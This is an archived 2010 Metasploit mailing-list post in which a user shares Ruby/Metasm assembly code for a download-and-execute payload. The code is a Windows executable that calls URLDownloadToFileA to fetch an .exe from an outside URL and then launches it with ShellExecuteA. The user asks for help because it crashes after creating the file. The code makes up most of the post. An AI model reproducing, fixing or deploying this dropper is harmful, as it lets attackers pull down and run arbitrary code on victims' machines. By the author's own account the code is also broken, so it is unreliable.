Home page logo
/

metasploit logo Metasploit mailing list archives

Re: Dynamic creation of payload executables with metasm
From: John B <johnb.electric () gmail com>
Date: Mon, 31 May 2010 15:47:34 -0400

I'll take a look at that I couldn't find any asm code for the encoder just
hex arrays, and if you've been reading my posts you'll know I'm having
trouble going from hex array back to asm.
thanks

Question # 4 (i think):

Just to test out metasm I tried to create a download execute payload from
scratch using imports just as a test and I'm having trouble getting it to
work following it in ollydbg it calls urldownloadtofile, creates the file in
the dir but either freezes or crashes trying to execute a non existing
memory adddress.  Here is the code if any body is familiar with Metasm and
can point out what I'm doing wrong, the syntax is from there docs and it
throws no error during assembly, but it doesn't get past creating an empty
file.

require 'metasm'

pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS

.entrypoint

push 0
push 0
push PATH
push URL
push 0
call download

push 0
push 0
push 0
push PATH
push CMD
push 0
call execute

ret

.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download

.data

URL db "http://imperiumsec.com/download/hellow.exe";, 0
PATH db "c:/users/john/testd.exe",0
CMD db "open",0

EOS

pe.encode_file 'down.exe'
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault